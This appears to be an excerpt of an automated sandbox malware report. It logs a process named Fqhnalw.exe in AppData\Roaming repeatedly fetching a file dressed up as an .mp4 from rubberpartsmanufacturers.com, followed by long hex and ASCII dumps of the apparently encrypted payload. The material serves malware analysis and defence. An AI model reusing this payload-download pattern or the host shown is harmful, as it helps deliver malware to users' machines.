                                                            Data Ascii: u-AG/:ZRh9}P"8j&3;be,8M+7sDv&X=J8c^k\3"t0\"'cFr^*lW*8/Y2eyE1.pV0*k9jZ-nVit9}rKs;3,(]#tv58~?%hMSG6bi\rfl,#v
                                                            2024-10-09 13:01:38 UTC8000INData Raw: da 1d 2c 51 0b 48 d0 b0 57 51 b3 44 1d 40 1f 53 ea 98 4f c5 cf b7 e1 c9 df 10 0d 0f 11 26 c8 71 36 f8 e0 2f 7f 39 b4 8b 83 a0 a9 2e a0 5b 3e 4d cc 79 20 36 d4 07 2a 00 a8 6d 4f e1 da 53 fa 23 6d f0 39 ca 60 81 87 66 e1 d0 20 e8 22 c3 6e 08 a0 48 ca 6e 8b 08 70 39 c3 3c e5 3f 20 17 fd 1b 98 10 b7 98 28 35 ea e3 34 b7 0f 7a ef 95 f2 43 4a 77 73 e8 e8 9e bf d6 ec b8 5c 3b 9a e5 06 80 3c e5 24 8b 32 52 56 4b ad 17 15 03 9c bd 37 c9 65 f6 f4 40 06 f2 7a bc c4 ae f8 f0 2d fd 11 3f 59 1f 68 8f 24 c9 c3 52 ec 66 24 cb 41 85 16 d6 13 2f 4b b1 82 24 20 8b b3 bf b7 de ba 91 a0 b1 e8 1e 95 55 a4 a2 b3 62 ab f8 e7 3e dd 71 ad 2e eb 82 c4 2a 24 48 e0 a5 0d 4f c6 7a a8 fa fb 3e a5 56 d3 f9 d5 d4 42 ca 68 26 4c 6d c6 a7 b9 44 e7 8e c4 d7 3c 83 5b 11 6d 3f f5 dc 14 d3 0c
                                                            Data Ascii: ,QHWQD@SO&q6/9.[>My 6*mOS#m9`f "nHnp9<? (54zCJws\;<$2RVK7e@z-?Yh$Rf$A/K$ Ub>q.*$HOz>VBh&LmD<[m?
                                                            2024-10-09 13:01:38 UTC8000INData Raw: dd 01 b8 33 bb 76 d4 e0 a7 97 cb 81 3e 16 97 a7 00 a7 25 ae a7 d5 09 7c 1a 3c cf 7e bb b4 6d 71 72 24 dc e7 f3 6d 86 5c 58 f4 ed 8d 45 ca a1 f9 21 01 e1 5d ef ba a2 51 f8 bf ce 65 ff ca 52 a1 7a ab 15 81 95 ff 1a 61 a3 22 8a 5c f1 01 77 23 16 62 c6 a2 ae 01 63 17 b0 f6 23 e1 f2 c6 13 49 47 69 3a f2 54 40 b5 3d 67 20 4e 95 e1 4a 63 18 a8 47 39 83 d2 ed a2 fe 00 c0 ce e7 b0 0c 3d d5 9b 11 9b b8 63 56 19 ce 86 86 0f 8b 58 ee 07 e7 c0 33 a8 0b 75 fd c7 e0 fc 12 f4 6e d0 16 34 06 d3 29 3a 8f 0b 02 fd 6f fa f5 46 1f 5d 69 80 80 4a 18 78 96 d9 af 53 50 a1 da 49 3f 03 db c2 8f c8 86 cb aa 82 84 3b 77 25 9d 4b e0 74 f0 1e 60 16 13 08 17 f7 2d ce 1c 1b 9f dc 7d 9c 46 fb 26 2b 60 f0 59 15 03 f3 aa 6c 3a 6a 5d 09 c9 cf 3c 62 ba 5f fc 7f 73 69 5f 49 f0 1c 62 f5 19 da
                                                            Data Ascii: 3v>%|<~mqr$m\XE!]QeRza"\w#bc#IGi:T@=g NJcG9=cVX3un4):oF]iJxSPI?;w%Kt`-}F&+`Yl:j]<b_si_Ib
                                                            2024-10-09 13:01:38 UTC8000INData Raw: 95 56 61 0f 61 8f ce b9 86 30 8f fb 99 97 5e 84 b9 91 bb b0 20 17 48 12 3f 9d 40 e5 85 31 7d 29 be 90 c9 f3 72 3d 38 de be 52 fc 41 63 77 75 53 ac f5 6e 1a cb 40 f4 55 03 88 3f 89 a5 18 19 12 ec 3e 60 1d cd b3 05 fb 23 a0 5b 91 3b 2f 7c ff 14 28 99 8f df 38 db a5 ca 75 2b 76 33 17 27 4f 0a d1 6c fe 3c 76 aa 51 b3 e8 45 d1 ba fa cd 4f 48 17 5e 4f 68 57 31 2a 40 22 e2 4e df 55 83 bb 7e 5b 79 93 d1 51 cf 49 dd bd 60 60 4a b7 67 8a e5 33 a9 72 43 61 07 60 ff c7 55 6b 59 f9 a0 0c 9d 1e 31 70 2e 32 71 f1 e7 7b 8d 94 0d bb 29 6f ec a7 d9 91 4c ca c4 f7 8b 31 0d 54 29 cb 46 60 6a b2 8e 77 20 64 8a 20 d0 3f cb 94 41 08 a2 3f 97 eb 32 46 bc 69 14 98 d2 ab ed 09 4b bc 34 cc fe 75 70 c3 0d 6c 55 36 0e 29 64 2b bb 26 c1 7b 92 02 53 97 7b 68 96 0d d3 12 f8 9b 7f d0 3f
                                                            Data Ascii: Vaa0^ H?@1})r=8RAcwuSn@U?>`#[;/|(8u+v3'Ol<vQEOH^OhW1*@"NU~[yQI``Jg3rCa`UkY1p.2q{)oL1T)F`jw d ?A?2FiK4uplU6)d+&{S{h?
                                                            2024-10-09 13:01:38 UTC8000INData Raw: 3c bb ee c0 25 a7 cb 08 3c 34 bc b2 22 90 76 40 3d bb 29 7e 17 a5 a4 6b a7 fb d0 0c 06 5f 5c 60 ba eb 6c 59 13 8f f0 ed db 91 65 f9 b6 a6 26 9d 4d cf 4d 03 69 70 5a 9b ed 45 e3 fc 3e aa 38 5a e5 9a 0b e2 19 03 e8 11 af b8 81 2c a0 5c fd bd 6a db 2a 42 59 97 3b 9f 7e 63 47 a1 4a b6 8a f6 5b dc e5 9b 3b eb 3b c2 d4 df b7 e0 56 af 3f 08 94 fd e4 41 3a ae f3 1f 95 18 06 98 da 66 94 6c b2 dc 1b 96 9f a5 8f 6c 66 4e e8 e1 06 be 12 34 15 a9 4a f4 86 83 6a 20 00 df b9 96 a8 55 82 d8 0c 98 15 34 95 eb 44 78 05 d4 53 ea 2e 7e 6b fd 40 7f 71 a0 f6 45 aa 1e 31 b3 af c7 69 c4 02 6d 24 46 ef 59 ee 21 7b 7d 89 3f 97 58 12 81 f1 86 1b 49 b0 d1 c5 36 8e b6 1e 8c 5e db 21 f6 46 50 80 09 d2 bb 5d ae 4c 5d c4 9a 10 80 a1 a8 56 24 08 b6 b2 b0 e4 91 78 46 81 66 6e 80 8e c0 ac
                                                            Data Ascii: <%<4"v@=)~k_\`lYe&MMipZE>8Z,\j*BY;~cGJ[;;V?A:fllfN4Jj U4DxS.~k@qE1im$FY!{}?XI6^!FP]L]V$xFfn


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.949818103.191.208.1224437784C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-09 13:01:55 UTC98OUTGET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1
                                                            Host: rubberpartsmanufacturers.com
                                                            Connection: Keep-Alive
                                                            2024-10-09 13:01:56 UTC234INHTTP/1.1 200 OK
                                                            Date: Wed, 09 Oct 2024 13:01:56 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Last-Modified: Wed, 09 Oct 2024 11:18:34 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 959504
                                                            Content-Type: video/mp4
                                                            2024-10-09 13:01:56 UTC7958INData Raw: e2 28 15 53 f2 7b 15 07 aa d5 4d 1f 3b 2f 02 b6 03 27 fc aa 10 81 f7 c9 70 03 06 1c 22 aa 28 14 82 64 60 6b 1d 58 9a 33 26 ca 89 1a 85 b6 02 35 c2 db b3 17 1a 22 10 f8 52 46 a8 05 84 68 55 5f e8 21 39 2d 11 b0 72 e6 9d 6e 2e ad 62 02 65 3f ed 94 ae 42 c5 65 1f 2b 34 3c a4 a9 27 e5 15 4a cf ec 32 19 8c 82 8b 31 18 2b a1 e1 73 86 35 da 64 25 b7 00 79 1e 25 db 5f a0 a0 08 cd 61 d3 2f 8c 90 ca 6b a1 14 94 60 4f b2 d2 51 ec 16 0a 4a dd 58 71 61 70 b3 f2 b8 2d a3 10 12 5c 74 07 4a fe 91 81 8e c3 6d 8f b8 9b 5a 61 4e ac 3e 0f 1a c8 cb d9 30 fe 29 a8 48 31 23 94 28 92 fe d3 4d 2b bf 49 6d 42 09 ef 8b 4c 83 f8 fd 25 9f 39 71 61 4f c4 84 1c 4a e3 7a 18 96 a9 89 f9 08 06 f7 8d f7 2b b0 de 09 d9 91 64 d2 a3 bc be 29 76 2c 19 e1 cc 3f 71 5e 9d 69 81 f0 1a 05 77 d7 5f
                                                            Data Ascii: (S{M;/'p"(d`kX3&5"RFhU_!9-rn.be?Be+4<'J21+s5d%y%_a/k`OQJXqap-\tJmZaN>0)H1#(M+ImBL%9qaOJz+d)v,?q^iw_
                                                            2024-10-09 13:01:56 UTC8000INData Raw: 1a b3 17 7f 75 07 79 13 cf ef d1 58 7e 08 f3 bc 5b f4 e6 bb 6a 08 2b 03 5c c8 fe 7b 53 af 83 69 db ad 67 d5 aa 23 45 0c 4b 36 4d 80 4b b5 2d c7 a3 a0 1c 95 52 a9 28 fe ad 72 25 cb f4 e2 16 73 e2 34 64 7d a0 3e fa ac e3 9a fa e7 2a c0 78 b7 0a fd 40 b2 0a 0b e8 2b 3f bb 8b fc f9 cf 60 55 04 32 39 2a 2d 92 2c 56 78 c6 31 a5 fd 3a d8 87 a4 c7 66 c3 ef 55 26 1d 13 c6 39 e4 5a f0 55 be 70 5c 70 5c ba 5d f4 0c 70 fe 57 ff 34 43 f6 9c 32 49 d5 00 19 40 2f d3 91 d6 f0 64 14 bd 7f 49 d2 dd 13 92 c1 01 64 01 d1 00 2f 9b 0c e8 aa d1 1f 1a b7 61 09 8a e5 98 cb f6 bc 6f 20 6b c3 d2 c6 de 23 02 dc e1 34 47 99 93 6f ae f5 7e 0e c4 94 c7 58 6c 37 cc 59 4d 74 32 bd 43 02 a9 05 38 11 b3 58 ca 04 8d ff a1 c9 c5 0f 8c 53 ec 67 d1 75 a6 0e 8d de 2b ee 58 29 99 f7 62 ed 30 d3
                                                            Data Ascii: uyX~[j+\{Sig#EK6MK-R(r%s4d}>*x@+?`U29*-,Vx1:fU&9ZUp\p\]pW4C2I@/dId/ao k#4Go~Xl7YMt2C8XSgu+X)b0
                                                            2024-10-09 13:01:56 UTC8000INData Raw: 30 06 f2 49 8f 29 4e 0f 70 49 10 e1 4d 9b 65 31 25 aa ae 16 d9 cb eb 16 a5 0d 0b 4e 14 71 e5 96 82 6b 7a 79 33 a1 5d 96 58 89 91 d7 b6 fc 50 9d 6f 5a 3e c5 42 9c 73 ad bc 57 56 28 36 77 fd fd 1a 40 1d 36 02 da 6a 56 50 03 a5 02 6f 3d fa b9 3c a5 d3 cb 45 e1 91 92 d7 8b c2 fe f2 2e a0 d3 f1 64 7e d1 30 6e 5e 38 ec f1 75 1c 5e 30 be 22 b1 6b cc 87 1a c1 c0 05 64 55 e7 a0 88 aa 49 d8 7b bf df aa 11 7b 5c 14 03 50 76 69 bd 6b 81 51 5e 8b 7f 39 3c a6 41 98 b7 c0 c6 7d 95 41 64 b7 3b dd ed 8b 7a 71 a3 9c 8f 8d 67 3b 8f 0a 92 91 18 b7 86 5a 81 39 9e f5 a8 f5 4c 0d 6c 52 18 81 93 b9 ee f6 d0 9f 92 71 fc a7 90 db 98 d5 3b 98 b6 b0 d0 26 95 12 50 b6 ac 33 54 4b 70 bb ba 3e 83 94 03 13 e8 b3 97 2a 66 77 21 56 f8 ae 3f d8 37 cb b1 40 ec bf 05 44 09 e5 df 66 02 44 b3
                                                            Data Ascii: 0I)NpIMe1%Nqkzy3]XPoZ>BsWV(6w@6jVPo=<E.d~0n^8u^0"kdUI{{\PvikQ^9<A}Ad;zqg;Z9LlRq;&P3TKp>*fw!V?7@DfD
                                                            2024-10-09 13:01:56 UTC8000INData Raw: d9 13 75 01 96 3c 96 1c 60 80 27 7f c3 80 15 6a 8e f3 88 98 31 d0 5b e5 2e 15 93 ed 58 bf ce ed 8c 37 99 b9 40 56 41 8a 90 69 98 dd ef f1 6d f5 95 00 df 40 31 88 48 a1 d0 ff a8 b9 c2 12 b0 57 d3 09 99 4c 77 40 10 b7 38 0e 0f 8d 07 96 f7 d6 56 4a f2 54 6a 64 82 1a 4c af 8f ca 93 98 9b 62 5a be c7 39 79 12 de 68 6a 90 8a 80 89 29 71 f5 0b a6 81 dc 43 26 5b e0 7e d9 42 ca 33 55 3a 29 e7 f2 53 9c 09 2f 0c a7 e8 0b c3 9e 33 b2 c6 e2 fc 89 2b 07 73 13 83 59 84 6f af 47 0b 70 6a d2 7c eb b2 b6 1e 60 39 6d 46 c8 ca f1 31 53 50 75 e0 76 c1 cc 58 e3 ce 4a 44 ab b8 cf 79 50 f7 d2 33 90 04 e0 6f 2e 7d 17 80 f6 a7 97 a1 52 87 54 a2 df c5 8f 18 7c 0d 65 89 ec e6 76 04 dd c1 94 0c c9 9a 79 61 6d cc 7c 87 f1 b2 54 12 55 38 2c 87 91 f2 a0 46 01 c3 19 a6 66 e3 01 7e 19 27
                                                            Data Ascii: u<`'j1[.X7@VAim@1HWLw@8VJTjdLbZ9yhj)qC&[~B3U:)S/3+sYoGpj|`9mF1SPuvXJDyP3o.}RT|evyam|TU8,Ff~'
                                                            2024-10-09 13:01:56 UTC8000INData Raw: 50 32 ff 4b 3f af b0 33 ec 1d 96 0d a7 bf ed ea 5e 56 f1 2a 40 6d 43 2d f0 4f f1 36 ad 80 78 d1 52 9d d2 07 74 7f 51 f6 31 e1 e1 cd 1d b3 61 36 63 b2 50 58 32 54 48 f3 84 c9 52 c8 46 90 0d 67 a4 d0 cb c8 50 08 a7 5e 37 62 57 85 ea 68 1a 8f 74 57 25 b8 5f e9 5d 6a 82 ed 57 28 0e b1 0b 51 06 2c 9a ac 5b f5 90 bd 42 92 8e 57 9f 49 95 5a a7 21 3b 48 4b e8 3a 6d 37 f4 29 35 87 85 1b 1f 78 1b f8 3a 5b 77 27 b8 7e 13 f2 e1 44 98 d5 6f 33 18 ca 45 4c de 4e 47 fe 13 79 3c d2 56 96 e4 d0 a7 3a 98 b1 65 0d 96 3b d3 e1 5e b4 3e 3b 08 cf 56 6d bf b3 3d 6d 1e 1c bc b8 1d f8 07 d1 36 cc 7c 7d b6 2d e9 c7 62 f4 54 cf f6 45 94 91 42 8a 58 b6 23 44 c0 e8 fc bd a1 eb b7 d8 54 58 4b 21 fb 18 ff af aa 5c b6 99 c0 3d 55 8a c6 f7 64 7d 49 3c 75 16 59 61 97 aa 00 40 1a 7d 8b 20
                                                            Data Ascii: P2K?3^V*@mC-O6xRtQ1a6cPX2THRFgP^7bWhtW%_]jW(Q,[BWIZ!;HK:m7)5x:[w'~Do3ELNGy<V:e;^>;Vm=m6|}-bTEBX#DTXK!\=Ud}I<uYa@}
                                                            2024-10-09 13:01:56 UTC8000INData Raw: 1d 8a bf 75 2d cc ee e4 41 90 85 e4 0f 9e 47 2f 3a 5a 10 b9 52 98 68 39 e0 7d 50 88 d8 22 ac 38 e7 09 6a 84 13 26 e4 ab 33 ce 3b 15 0c a8 62 de 65 2c af e0 95 07 d5 1c 38 7f 4d 2b f3 83 37 c9 1c 1b f6 af 1c d6 73 d2 ce 1f 44 76 d3 b9 e8 26 58 b2 b3 10 3d ce a5 88 f1 4a 13 38 fa 63 e5 5e c1 6b 5c 33 ab 22 74 8c 8c 30 9c f8 5c 22 cc 27 ba a8 63 b5 8c 89 a9 46 72 5e 2a 6c 0e 57 2a 38 2f b0 ae ed 0e 92 59 32 65 79 45 16 31 2e 70 fa 1f cc fd 56 fc e8 30 2a e4 6b 39 6a a8 88 ec 8a de 5a 2d ca 6e d8 d0 c1 b3 a7 93 eb 56 69 74 39 7d 72 4b 06 13 e3 fe 73 3b ca b9 33 a4 2c bd 28 ce e0 a8 b4 5d f4 b8 23 a9 8c fd af 89 91 9b 74 82 af 9a 76 0b 35 c0 a1 9d ad 38 7e 3f 89 05 25 f5 e4 9d 68 4d 53 47 fe 36 a0 62 69 9b 5c 72 a1 06 03 66 6c ce 2c ff 16 82 23 00 76 d7 a9 9b
                                                            Data Ascii: u-AG/:ZRh9}P"8j&3;be,8M+7sDv&X=J8c^k\3"t0\"'cFr^*lW*8/Y2eyE1.pV0*k9jZ-nVit9}rKs;3,(]#tv58~?%hMSG6bi\rfl,#v
                                                            2024-10-09 13:01:56 UTC8000INData Raw: da 1d 2c 51 0b 48 d0 b0 57 51 b3 44 1d 40 1f 53 ea 98 4f c5 cf b7 e1 c9 df 10 0d 0f 11 26 c8 71 36 f8 e0 2f 7f 39 b4 8b 83 a0 a9 2e a0 5b 3e 4d cc 79 20 36 d4 07 2a 00 a8 6d 4f e1 da 53 fa 23 6d f0 39 ca 60 81 87 66 e1 d0 20 e8 22 c3 6e 08 a0 48 ca 6e 8b 08 70 39 c3 3c e5 3f 20 17 fd 1b 98 10 b7 98 28 35 ea e3 34 b7 0f 7a ef 95 f2 43 4a 77 73 e8 e8 9e bf d6 ec b8 5c 3b 9a e5 06 80 3c e5 24 8b 32 52 56 4b ad 17 15 03 9c bd 37 c9 65 f6 f4 40 06 f2 7a bc c4 ae f8 f0 2d fd 11 3f 59 1f 68 8f 24 c9 c3 52 ec 66 24 cb 41 85 16 d6 13 2f 4b b1 82 24 20 8b b3 bf b7 de ba 91 a0 b1 e8 1e 95 55 a4 a2 b3 62 ab f8 e7 3e dd 71 ad 2e eb 82 c4 2a 24 48 e0 a5 0d 4f c6 7a a8 fa fb 3e a5 56 d3 f9 d5 d4 42 ca 68 26 4c 6d c6 a7 b9 44 e7 8e c4 d7 3c 83 5b 11 6d 3f f5 dc 14 d3 0c
                                                            Data Ascii: ,QHWQD@SO&q6/9.[>My 6*mOS#m9`f "nHnp9<? (54zCJws\;<$2RVK7e@z-?Yh$Rf$A/K$ Ub>q.*$HOz>VBh&LmD<[m?
                                                            2024-10-09 13:01:56 UTC8000INData Raw: dd 01 b8 33 bb 76 d4 e0 a7 97 cb 81 3e 16 97 a7 00 a7 25 ae a7 d5 09 7c 1a 3c cf 7e bb b4 6d 71 72 24 dc e7 f3 6d 86 5c 58 f4 ed 8d 45 ca a1 f9 21 01 e1 5d ef ba a2 51 f8 bf ce 65 ff ca 52 a1 7a ab 15 81 95 ff 1a 61 a3 22 8a 5c f1 01 77 23 16 62 c6 a2 ae 01 63 17 b0 f6 23 e1 f2 c6 13 49 47 69 3a f2 54 40 b5 3d 67 20 4e 95 e1 4a 63 18 a8 47 39 83 d2 ed a2 fe 00 c0 ce e7 b0 0c 3d d5 9b 11 9b b8 63 56 19 ce 86 86 0f 8b 58 ee 07 e7 c0 33 a8 0b 75 fd c7 e0 fc 12 f4 6e d0 16 34 06 d3 29 3a 8f 0b 02 fd 6f fa f5 46 1f 5d 69 80 80 4a 18 78 96 d9 af 53 50 a1 da 49 3f 03 db c2 8f c8 86 cb aa 82 84 3b 77 25 9d 4b e0 74 f0 1e 60 16 13 08 17 f7 2d ce 1c 1b 9f dc 7d 9c 46 fb 26 2b 60 f0 59 15 03 f3 aa 6c 3a 6a 5d 09 c9 cf 3c 62 ba 5f fc 7f 73 69 5f 49 f0 1c 62 f5 19 da
                                                            Data Ascii: 3v>%|<~mqr$m\XE!]QeRza"\w#bc#IGi:T@=g NJcG9=cVX3un4):oF]iJxSPI?;w%Kt`-}F&+`Yl:j]<b_si_Ib
                                                            2024-10-09 13:01:56 UTC8000INData Raw: 95 56 61 0f 61 8f ce b9 86 30 8f fb 99 97 5e 84 b9 91 bb b0 20 17 48 12 3f 9d 40 e5 85 31 7d 29 be 90 c9 f3 72 3d 38 de be 52 fc 41 63 77 75 53 ac f5 6e 1a cb 40 f4 55 03 88 3f 89 a5 18 19 12 ec 3e 60 1d cd b3 05 fb 23 a0 5b 91 3b 2f 7c ff 14 28 99 8f df 38 db a5 ca 75 2b 76 33 17 27 4f 0a d1 6c fe 3c 76 aa 51 b3 e8 45 d1 ba fa cd 4f 48 17 5e 4f 68 57 31 2a 40 22 e2 4e df 55 83 bb 7e 5b 79 93 d1 51 cf 49 dd bd 60 60 4a b7 67 8a e5 33 a9 72 43 61 07 60 ff c7 55 6b 59 f9 a0 0c 9d 1e 31 70 2e 32 71 f1 e7 7b 8d 94 0d bb 29 6f ec a7 d9 91 4c ca c4 f7 8b 31 0d 54 29 cb 46 60 6a b2 8e 77 20 64 8a 20 d0 3f cb 94 41 08 a2 3f 97 eb 32 46 bc 69 14 98 d2 ab ed 09 4b bc 34 cc fe 75 70 c3 0d 6c 55 36 0e 29 64 2b bb 26 c1 7b 92 02 53 97 7b 68 96 0d d3 12 f8 9b 7f d0 3f
                                                            Data Ascii: Vaa0^ H?@1})r=8RAcwuSn@U?>`#[;/|(8u+v3'Ol<vQEOH^OhW1*@"NU~[yQI``Jg3rCa`UkY1p.2q{)oL1T)F`jw d ?A?2FiK4uplU6)d+&{S{h?
                                                            2024-10-09 13:01:56 UTC8000INData Raw: 3c bb ee c0 25 a7 cb 08 3c 34 bc b2 22 90 76 40 3d bb 29 7e 17 a5 a4 6b a7 fb d0 0c 06 5f 5c 60 ba eb 6c 59 13 8f f0 ed db 91 65 f9 b6 a6 26 9d 4d cf 4d 03 69 70 5a 9b ed 45 e3 fc 3e aa 38 5a e5 9a 0b e2 19 03 e8 11 af b8 81 2c a0 5c fd bd 6a db 2a 42 59 97 3b 9f 7e 63 47 a1 4a b6 8a f6 5b dc e5 9b 3b eb 3b c2 d4 df b7 e0 56 af 3f 08 94 fd e4 41 3a ae f3 1f 95 18 06 98 da 66 94 6c b2 dc 1b 96 9f a5 8f 6c 66 4e e8 e1 06 be 12 34 15 a9 4a f4 86 83 6a 20 00 df b9 96 a8 55 82 d8 0c 98 15 34 95 eb 44 78 05 d4 53 ea 2e 7e 6b fd 40 7f 71 a0 f6 45 aa 1e 31 b3 af c7 69 c4 02 6d 24 46 ef 59 ee 21 7b 7d 89 3f 97 58 12 81 f1 86 1b 49 b0 d1 c5 36 8e b6 1e 8c 5e db 21 f6 46 50 80 09 d2 bb 5d ae 4c 5d c4 9a 10 80 a1 a8 56 24 08 b6 b2 b0 e4 91 78 46 81 66 6e 80 8e c0 ac
                                                            Data Ascii: <%<4"v@=)~k_\`lYe&MMipZE>8Z,\j*BY;~cGJ[;;V?A:fllfN4Jj U4DxS.~k@qE1im$FY!{}?XI6^!FP]L]V$xFfn


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.949870103.191.208.1224437972C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-09 13:02:03 UTC98OUTGET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1
                                                            Host: rubberpartsmanufacturers.com
                                                            Connection: Keep-Alive
                                                            2024-10-09 13:02:04 UTC234INHTTP/1.1 200 OK
                                                            Date: Wed, 09 Oct 2024 13:02:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Last-Modified: Wed, 09 Oct 2024 11:18:34 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 959504
                                                            Content-Type: video/mp4
                                                            2024-10-09 13:02:04 UTC7958INData Raw: e2 28 15 53 f2 7b 15 07 aa d5 4d 1f 3b 2f 02 b6 03 27 fc aa 10 81 f7 c9 70 03 06 1c 22 aa 28 14 82 64 60 6b 1d 58 9a 33 26 ca 89 1a 85 b6 02 35 c2 db b3 17 1a 22 10 f8 52 46 a8 05 84 68 55 5f e8 21 39 2d 11 b0 72 e6 9d 6e 2e ad 62 02 65 3f ed 94 ae 42 c5 65 1f 2b 34 3c a4 a9 27 e5 15 4a cf ec 32 19 8c 82 8b 31 18 2b a1 e1 73 86 35 da 64 25 b7 00 79 1e 25 db 5f a0 a0 08 cd 61 d3 2f 8c 90 ca 6b a1 14 94 60 4f b2 d2 51 ec 16 0a 4a dd 58 71 61 70 b3 f2 b8 2d a3 10 12 5c 74 07 4a fe 91 81 8e c3 6d 8f b8 9b 5a 61 4e ac 3e 0f 1a c8 cb d9 30 fe 29 a8 48 31 23 94 28 92 fe d3 4d 2b bf 49 6d 42 09 ef 8b 4c 83 f8 fd 25 9f 39 71 61 4f c4 84 1c 4a e3 7a 18 96 a9 89 f9 08 06 f7 8d f7 2b b0 de 09 d9 91 64 d2 a3 bc be 29 76 2c 19 e1 cc 3f 71 5e 9d 69 81 f0 1a 05 77 d7 5f
                                                            Data Ascii: (S{M;/'p"(d`kX3&5"RFhU_!9-rn.be?Be+4<'J21+s5d%y%_a/k`OQJXqap-\tJmZaN>0)H1#(M+ImBL%9qaOJz+d)v,?q^iw_
                                                            2024-10-09 13:02:04 UTC8000INData Raw: 1a b3 17 7f 75 07 79 13 cf ef d1 58 7e 08 f3 bc 5b f4 e6 bb 6a 08 2b 03 5c c8 fe 7b 53 af 83 69 db ad 67 d5 aa 23 45 0c 4b 36 4d 80 4b b5 2d c7 a3 a0 1c 95 52 a9 28 fe ad 72 25 cb f4 e2 16 73 e2 34 64 7d a0 3e fa ac e3 9a fa e7 2a c0 78 b7 0a fd 40 b2 0a 0b e8 2b 3f bb 8b fc f9 cf 60 55 04 32 39 2a 2d 92 2c 56 78 c6 31 a5 fd 3a d8 87 a4 c7 66 c3 ef 55 26 1d 13 c6 39 e4 5a f0 55 be 70 5c 70 5c ba 5d f4 0c 70 fe 57 ff 34 43 f6 9c 32 49 d5 00 19 40 2f d3 91 d6 f0 64 14 bd 7f 49 d2 dd 13 92 c1 01 64 01 d1 00 2f 9b 0c e8 aa d1 1f 1a b7 61 09 8a e5 98 cb f6 bc 6f 20 6b c3 d2 c6 de 23 02 dc e1 34 47 99 93 6f ae f5 7e 0e c4 94 c7 58 6c 37 cc 59 4d 74 32 bd 43 02 a9 05 38 11 b3 58 ca 04 8d ff a1 c9 c5 0f 8c 53 ec 67 d1 75 a6 0e 8d de 2b ee 58 29 99 f7 62 ed 30 d3
                                                            Data Ascii: uyX~[j+\{Sig#EK6MK-R(r%s4d}>*x@+?`U29*-,Vx1:fU&9ZUp\p\]pW4C2I@/dId/ao k#4Go~Xl7YMt2C8XSgu+X)b0
                                                            2024-10-09 13:02:04 UTC8000INData Raw: 30 06 f2 49 8f 29 4e 0f 70 49 10 e1 4d 9b 65 31 25 aa ae 16 d9 cb eb 16 a5 0d 0b 4e 14 71 e5 96 82 6b 7a 79 33 a1 5d 96 58 89 91 d7 b6 fc 50 9d 6f 5a 3e c5 42 9c 73 ad bc 57 56 28 36 77 fd fd 1a 40 1d 36 02 da 6a 56 50 03 a5 02 6f 3d fa b9 3c a5 d3 cb 45 e1 91 92 d7 8b c2 fe f2 2e a0 d3 f1 64 7e d1 30 6e 5e 38 ec f1 75 1c 5e 30 be 22 b1 6b cc 87 1a c1 c0 05 64 55 e7 a0 88 aa 49 d8 7b bf df aa 11 7b 5c 14 03 50 76 69 bd 6b 81 51 5e 8b 7f 39 3c a6 41 98 b7 c0 c6 7d 95 41 64 b7 3b dd ed 8b 7a 71 a3 9c 8f 8d 67 3b 8f 0a 92 91 18 b7 86 5a 81 39 9e f5 a8 f5 4c 0d 6c 52 18 81 93 b9 ee f6 d0 9f 92 71 fc a7 90 db 98 d5 3b 98 b6 b0 d0 26 95 12 50 b6 ac 33 54 4b 70 bb ba 3e 83 94 03 13 e8 b3 97 2a 66 77 21 56 f8 ae 3f d8 37 cb b1 40 ec bf 05 44 09 e5 df 66 02 44 b3
                                                            Data Ascii: 0I)NpIMe1%Nqkzy3]XPoZ>BsWV(6w@6jVPo=<E.d~0n^8u^0"kdUI{{\PvikQ^9<A}Ad;zqg;Z9LlRq;&P3TKp>*fw!V?7@DfD
                                                            2024-10-09 13:02:04 UTC8000INData Raw: d9 13 75 01 96 3c 96 1c 60 80 27 7f c3 80 15 6a 8e f3 88 98 31 d0 5b e5 2e 15 93 ed 58 bf ce ed 8c 37 99 b9 40 56 41 8a 90 69 98 dd ef f1 6d f5 95 00 df 40 31 88 48 a1 d0 ff a8 b9 c2 12 b0 57 d3 09 99 4c 77 40 10 b7 38 0e 0f 8d 07 96 f7 d6 56 4a f2 54 6a 64 82 1a 4c af 8f ca 93 98 9b 62 5a be c7 39 79 12 de 68 6a 90 8a 80 89 29 71 f5 0b a6 81 dc 43 26 5b e0 7e d9 42 ca 33 55 3a 29 e7 f2 53 9c 09 2f 0c a7 e8 0b c3 9e 33 b2 c6 e2 fc 89 2b 07 73 13 83 59 84 6f af 47 0b 70 6a d2 7c eb b2 b6 1e 60 39 6d 46 c8 ca f1 31 53 50 75 e0 76 c1 cc 58 e3 ce 4a 44 ab b8 cf 79 50 f7 d2 33 90 04 e0 6f 2e 7d 17 80 f6 a7 97 a1 52 87 54 a2 df c5 8f 18 7c 0d 65 89 ec e6 76 04 dd c1 94 0c c9 9a 79 61 6d cc 7c 87 f1 b2 54 12 55 38 2c 87 91 f2 a0 46 01 c3 19 a6 66 e3 01 7e 19 27
                                                            Data Ascii: u<`'j1[.X7@VAim@1HWLw@8VJTjdLbZ9yhj)qC&[~B3U:)S/3+sYoGpj|`9mF1SPuvXJDyP3o.}RT|evyam|TU8,Ff~'
